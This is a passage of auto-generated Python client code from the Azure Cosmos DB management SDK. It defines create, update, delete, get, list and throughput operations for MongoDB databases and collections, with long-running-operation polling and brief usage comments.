:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._create_update_mongo_db_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
options=options,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('MongoDBDatabase', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create_update_mongo_db_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}'}
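Each LRO method above defines a `get_long_running_output` closure that captures the caller's `raw` flag, so the poller can hand back either the deserialized model or a raw-response wrapper. A sketch of that shape with stand-in names (`FakeRawResponse` and `make_output_handler` are hypothetical, not msrest APIs):

```python
class FakeRawResponse:
    """Stand-in for msrest's ClientRawResponse wrapper."""
    def __init__(self, output, response):
        self.output = output
        self.response = response


def make_output_handler(deserialize, raw):
    """Build the output callback an LRO poller invokes on the final response."""
    def get_long_running_output(response):
        deserialized = deserialize(response)
        if raw:
            # Caller asked for the transport response alongside the model.
            return FakeRawResponse(deserialized, response)
        return deserialized
    return get_long_running_output
```

Capturing `raw` in a closure keeps the poller itself oblivious to the return-type choice; the generated code relies on exactly this to share one `LROPoller` path for both modes.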
def _delete_mongo_db_database_initial(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
# Construct URL
url = self.delete_mongo_db_database.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [202, 204]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
def delete_mongo_db_database(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, polling=True, **operation_config):
"""Deletes an existing Azure Cosmos DB MongoDB database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns None or
ClientRawResponse<None> if raw==True
:rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._delete_mongo_db_database_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
delete_mongo_db_database.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}'}
def get_mongo_db_database_throughput(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Gets the RUs per second of the MongoDB database under an existing Azure
Cosmos DB database account with the provided name.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: Throughput or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.Throughput or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/settings/throughput'}
def _update_mongo_db_database_throughput_initial(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, **operation_config):
update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)
# Construct URL
url = self.update_mongo_db_database_throughput.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def update_mongo_db_database_throughput(
self, resource_group_name, account_name, database_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
"""Update RUs per second of the an Azure Cosmos DB MongoDB database.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param resource: The standard JSON format of a resource throughput
:type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns Throughput or
ClientRawResponse<Throughput> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
raw_result = self._update_mongo_db_database_throughput_initial(
resource_group_name=resource_group_name,
account_name=account_name,
database_name=database_name,
resource=resource,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('Throughput', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
update_mongo_db_database_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/settings/throughput'}
def list_mongo_db_collections(
self, resource_group_name, account_name, database_name, custom_headers=None, raw=False, **operation_config):
"""Lists the MongoDB collection under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: An iterator like instance of MongoDBCollection
:rtype:
~azure.mgmt.cosmosdb.models.MongoDBCollectionPaged[~azure.mgmt.cosmosdb.models.MongoDBCollection]
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
def prepare_request(next_link=None):
if not next_link:
# Construct URL
url = self.list_mongo_db_collections.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
else:
url = next_link
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
return request
def internal_paging(next_link=None):
request = prepare_request(next_link)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
return response
# Deserialize response
header_dict = None
if raw:
header_dict = {}
deserialized = models.MongoDBCollectionPaged(internal_paging, self._deserialize.dependencies, header_dict)
return deserialized
list_mongo_db_collections.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections'}
def get_mongo_db_collection(
self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, **operation_config):
"""Gets the MongoDB collection under an existing Azure Cosmos DB database
account.
:param resource_group_name: Name of an Azure resource group.
:type resource_group_name: str
:param account_name: Cosmos DB database account name.
:type account_name: str
:param database_name: Cosmos DB database name.
:type database_name: str
:param collection_name: Cosmos DB collection name.
:type collection_name: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: MongoDBCollection or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.cosmosdb.models.MongoDBCollection or
~msrest.pipeline.ClientRawResponse
:raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
"""
# Construct URL
url = self.get_mongo_db_collection.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}'}
def _create_update_mongo_db_collection_initial(
self, resource_group_name, account_name, database_name, collection_name, resource, options, custom_headers=None, raw=False, **operation_config):
create_update_mongo_db_collection_parameters = models.MongoDBCollectionCreateUpdateParameters(resource=resource, options=options)
# Construct URL
url = self.create_update_mongo_db_collection.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
'databaseName': self._serialize.url("database_name", database_name, 'str'),
'collectionName': self._serialize.url("collection_name", collection_name, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(create_update_mongo_db_collection_parameters, 'MongoDBCollectionCreateUpdateParameters')
# Construct and send request
request = self._client.put(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 202]:
exp = CloudError(response)
exp.request_id = response.headers.get('x-ms-request-id')
raise exp
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('MongoDBCollection', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized

    def create_update_mongo_db_collection(
            self, resource_group_name, account_name, database_name, collection_name, resource, options, custom_headers=None, raw=False, polling=True, **operation_config):
        """Create or update an Azure Cosmos DB MongoDB Collection.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param collection_name: Cosmos DB collection name.
        :type collection_name: str
        :param resource: The standard JSON format of a MongoDB collection
        :type resource: ~azure.mgmt.cosmosdb.models.MongoDBCollectionResource
        :param options: A key-value pair of options to be applied for the
         request. This corresponds to the headers sent with the request.
        :type options: dict[str, str]
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns MongoDBCollection or
         ClientRawResponse<MongoDBCollection> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.MongoDBCollection]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.MongoDBCollection]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._create_update_mongo_db_collection_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            collection_name=collection_name,
            resource=resource,
            options=options,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('MongoDBCollection', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    create_update_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}'}
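    # Usage sketch (hypothetical resource names; assumes `client` is an
    # authenticated azure-mgmt-cosmosdb client object exposing this
    # operations group). The call returns a poller for the long-running
    # create/update operation:
    #
    #     poller = client.create_update_mongo_db_collection(
    #         'my-resource-group', 'my-account', 'my-database', 'my-collection',
    #         resource={'id': 'my-collection'}, options={})
    #     collection = poller.result()  # blocks until the LRO completes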

    def _delete_mongo_db_collection_initial(
            self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, **operation_config):
        # Construct URL
        url = self.delete_mongo_db_collection.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str'),
            'collectionName': self._serialize.url("collection_name", collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.delete(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [202, 204]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        if raw:
            client_raw_response = ClientRawResponse(None, response)
            return client_raw_response

    def delete_mongo_db_collection(
            self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, polling=True, **operation_config):
        """Deletes an existing Azure Cosmos DB MongoDB Collection.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param collection_name: Cosmos DB collection name.
        :type collection_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns None or
         ClientRawResponse<None> if raw==True
        :rtype: ~msrestazure.azure_operation.AzureOperationPoller[None] or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[None]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._delete_mongo_db_collection_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            collection_name=collection_name,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            if raw:
                client_raw_response = ClientRawResponse(None, response)
                return client_raw_response

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    delete_mongo_db_collection.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}'}

    def get_mongo_db_collection_throughput(
            self, resource_group_name, account_name, database_name, collection_name, custom_headers=None, raw=False, **operation_config):
        """Gets the RUs per second of the MongoDB collection under an existing
        Azure Cosmos DB database account with the provided name.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param collection_name: Cosmos DB collection name.
        :type collection_name: str
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: returns the direct response alongside the
         deserialized response
        :param operation_config: :ref:`Operation configuration
         overrides<msrest:optionsforoperations>`.
        :return: Throughput or ClientRawResponse if raw=true
        :rtype: ~azure.mgmt.cosmosdb.models.Throughput or
         ~msrest.pipeline.ClientRawResponse
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        # Construct URL
        url = self.get_mongo_db_collection_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str'),
            'collectionName': self._serialize.url("collection_name", collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct and send request
        request = self._client.get(url, query_parameters, header_parameters)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized
    get_mongo_db_collection_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}/settings/throughput'}
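    # Usage sketch (hypothetical resource names; assumes an authenticated
    # client as above). The deserialized Throughput model carries the
    # provisioned RU/s value:
    #
    #     throughput = client.get_mongo_db_collection_throughput(
    #         'my-resource-group', 'my-account', 'my-database', 'my-collection')
    #     print(throughput.throughput)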

    def _update_mongo_db_collection_throughput_initial(
            self, resource_group_name, account_name, database_name, collection_name, resource, custom_headers=None, raw=False, **operation_config):
        update_throughput_parameters = models.ThroughputUpdateParameters(resource=resource)

        # Construct URL
        url = self.update_mongo_db_collection_throughput.metadata['url']
        path_format_arguments = {
            'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
            'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', max_length=90, min_length=1, pattern=r'^[-\w\._\(\)]+$'),
            'accountName': self._serialize.url("account_name", account_name, 'str', max_length=50, min_length=3, pattern=r'^[a-z0-9]+(-[a-z0-9]+)*'),
            'databaseName': self._serialize.url("database_name", database_name, 'str'),
            'collectionName': self._serialize.url("collection_name", collection_name, 'str')
        }
        url = self._client.format_url(url, **path_format_arguments)

        # Construct parameters
        query_parameters = {}
        query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')

        # Construct headers
        header_parameters = {}
        header_parameters['Accept'] = 'application/json'
        header_parameters['Content-Type'] = 'application/json; charset=utf-8'
        if self.config.generate_client_request_id:
            header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
        if custom_headers:
            header_parameters.update(custom_headers)
        if self.config.accept_language is not None:
            header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')

        # Construct body
        body_content = self._serialize.body(update_throughput_parameters, 'ThroughputUpdateParameters')

        # Construct and send request
        request = self._client.put(url, query_parameters, header_parameters, body_content)
        response = self._client.send(request, stream=False, **operation_config)

        if response.status_code not in [200, 202]:
            exp = CloudError(response)
            exp.request_id = response.headers.get('x-ms-request-id')
            raise exp

        deserialized = None

        if response.status_code == 200:
            deserialized = self._deserialize('Throughput', response)

        if raw:
            client_raw_response = ClientRawResponse(deserialized, response)
            return client_raw_response

        return deserialized

    def update_mongo_db_collection_throughput(
            self, resource_group_name, account_name, database_name, collection_name, resource, custom_headers=None, raw=False, polling=True, **operation_config):
        """Update the RUs per second of an Azure Cosmos DB MongoDB collection.

        :param resource_group_name: Name of an Azure resource group.
        :type resource_group_name: str
        :param account_name: Cosmos DB database account name.
        :type account_name: str
        :param database_name: Cosmos DB database name.
        :type database_name: str
        :param collection_name: Cosmos DB collection name.
        :type collection_name: str
        :param resource: The standard JSON format of a resource throughput
        :type resource: ~azure.mgmt.cosmosdb.models.ThroughputResource
        :param dict custom_headers: headers that will be added to the request
        :param bool raw: The poller return type is ClientRawResponse, the
         direct response alongside the deserialized response
        :param polling: True for ARMPolling, False for no polling, or a
         polling object for personal polling strategy
        :return: An instance of LROPoller that returns Throughput or
         ClientRawResponse<Throughput> if raw==True
        :rtype:
         ~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.cosmosdb.models.Throughput]
         or
         ~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.cosmosdb.models.Throughput]]
        :raises: :class:`CloudError<msrestazure.azure_exceptions.CloudError>`
        """
        raw_result = self._update_mongo_db_collection_throughput_initial(
            resource_group_name=resource_group_name,
            account_name=account_name,
            database_name=database_name,
            collection_name=collection_name,
            resource=resource,
            custom_headers=custom_headers,
            raw=True,
            **operation_config
        )

        def get_long_running_output(response):
            deserialized = self._deserialize('Throughput', response)

            if raw:
                client_raw_response = ClientRawResponse(deserialized, response)
                return client_raw_response

            return deserialized

        lro_delay = operation_config.get(
            'long_running_operation_timeout',
            self.config.long_running_operation_timeout)
        if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
        elif polling is False: polling_method = NoPolling()
        else: polling_method = polling
        return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
    update_mongo_db_collection_throughput.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.DocumentDB/databaseAccounts/{accountName}/apis/mongodb/databases/{databaseName}/collections/{collectionName}/settings/throughput'}
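    # Usage sketch (hypothetical resource names): updating throughput is a
    # long-running operation, so the call returns a poller rather than the
    # final Throughput resource. The `resource` argument may be a
    # ThroughputResource model or an equivalent dict:
    #
    #     poller = client.update_mongo_db_collection_throughput(
    #         'my-resource-group', 'my-account', 'my-database', 'my-collection',
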